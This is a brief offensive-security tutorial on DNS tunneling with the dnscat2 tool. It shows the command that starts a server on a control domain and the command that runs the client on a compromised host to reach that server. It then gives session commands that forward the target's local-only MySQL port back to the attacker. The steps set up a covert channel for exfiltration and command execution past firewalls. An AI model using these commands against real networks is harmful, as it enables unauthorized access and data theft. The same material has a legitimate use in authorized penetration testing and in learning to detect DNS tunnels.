DNS Tunneling

In this method DNS protocol is exploited to both exfiltrate and infiltrate data from a network. DNSCat2 tool is used for both running as a DNS server, at the control system end, and DNS client, at the compromized system end, to pass data between the systems. This tools comes handy in situations where DNS protocol is the only protocol allowed by the firewall that separates both the networks.

The DNS server has to be started on the system that you have direct control over using the following command,

dnscat2-server particle42.com

Then the DNScat client binary has to be transferred to the compromized system using other channels and you should be able to execute commands on this system to start the dnscat client. This does present a significant hurdle as the tool by itself is being used in a scenario where other protocols and access are unavailable. However, the tool along with the initial command has to be delivered to the compromized system. The following command has to be executed,

/dnscat --dns=server=<server ip>,port=53 --secret=<secret code displayed at server>

Once the connection is successfull an inidicating message will be displayed in the terminal. The following commands can be executed at the server end to access a service on that system or network through the DNS protocol. In this scenario we take it that the target system is running a mysql db accessible only locally,

#This command will list the windows available
windows
#Choose the serial number of a window listed
window -i 1
#This command creates a loopback to the local system mysql port
listen 127.0.0.1:4455 127.0.0.1:3306

The last command will create a listening port on the control system to channel all sql commands to the target system on the port 3306. Since mysql accepts only local connection 127.0.0.1:3306 is used as a loop back on the target system.

In scenarios where a different system has to be accessed the IP Address along with the port should be used as the parameter in the above command.